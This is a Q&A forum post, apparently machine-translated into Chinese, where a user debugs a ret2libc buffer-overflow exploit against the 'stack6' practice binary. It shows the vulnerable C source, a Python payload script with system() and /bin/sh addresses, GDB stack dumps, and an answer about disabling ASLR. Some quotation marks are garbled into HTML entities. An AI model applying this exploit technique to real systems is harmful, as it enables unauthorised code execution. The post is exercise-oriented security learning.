Question

我正在尝试执行ret2libc攻击。为此，我需要从libc调用System（）并传递参数＆＃34; / bin / sh＆＃34; （/ bin / sh的地址）。不幸的是，我每次都会得到＃34; Segmentation Fault＆＃34;。

请有人告诉我为什么？如果我正在寻找堆栈，一切看起来都很好（对我而言）。

这是我的源代码：

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();
}

我的漏洞利用代码如下：

    import struct
    offset = "A"*88
    system_adress = struct.pack("q",0x7ffff7a60510)
    nop = "\x90"*4
    bin_sh_adress = struct.pack("q",0x7ffff7b9b3f3)

    #libc_start = 0x7ffff7a1e000
    #sh_offset = 0x17d3f3
    #libc_start plus sh_Offset = 0x7ffff7b9b3f3

    print(offset + system_adress + nop + bin_sh_adress)

In the following my terminal commands:

>>> r < ./text
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/ExerciseExploit/stack6 < ./text

Breakpoint 2, getpath () at stack6.c:11
11    printf("input path please: "); fflush(stdout);
>>> i r rsp rbp
rsp            0x7fffffffe160   0x7fffffffe160
rbp            0x7fffffffe1b0   0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x00000000  0x00000000  0x00f0b2ff  0x00000000
0x7fffffffe170: 0x000000c2  0x00000000  0xffffe1a6  0x00007fff
0x7fffffffe180: 0x00000001  0x00000000  0xf7abe905  0x00007fff
0x7fffffffe190: 0x00000001  0x00000000  0x5555485d  0x00005555
0x7fffffffe1a0: 0xf7de70e0  0x00007fff  0x00000000  0x00000000
0x7fffffffe1b0: 0xffffe1d0  0x00007fff  0x555547fd  0x00005555
0x7fffffffe1c0: 0xffffe2b8  0x00007fff  0x00000000  0x00000001
0x7fffffffe1d0: 0x55554810  0x00005555  0xf7a3fa87  0x00007fff
0x7fffffffe1e0: 0x00000000  0x00000000  0xffffe2b8  0x00007fff
0x7fffffffe1f0: 0x00040000  0x00000001  0x555547e4  0x00005555
>>> n
input path please: 13     gets(buffer);
>>> n

Breakpoint 1, getpath () at stack6.c:15
15    ret = __builtin_return_address(0);
>>> i r rsp rbp
rsp            0x7fffffffe160   0x7fffffffe160
rbp            0x7fffffffe1b0   0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe170: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe180: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe190: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe1a0: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe1b0: 0x41414141  0x41414141  0xf7a60510  0x00007fff
0x7fffffffe1c0: 0x90909090  0xf7b9b3f3  0x00007fff  0x00000000
0x7fffffffe1d0: 0x55554810  0x00005555  0xf7a3fa87  0x00007fff
0x7fffffffe1e0: 0x00000000  0x00000000  0xffffe2b8  0x00007fff
0x7fffffffe1f0: 0x00040000  0x00000001  0x555547e4  0x00005555
>>> n
17    if((ret & 0xbf000000) == 0xbf000000) {
>>> n
22    printf("got path %s\n", buffer);
>>>

错误报告：

root@kali:~/Desktop/ExerciseExploit# python exploit6.py | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAA���
Segmentation fault

Answer 1

[关闭]

问题已解决：

未禁用ASLR ->禁用ASLR：echo 0> / proc / sys / kernel / randomize_va_space

分段故障ret2libc攻击

1 个答案: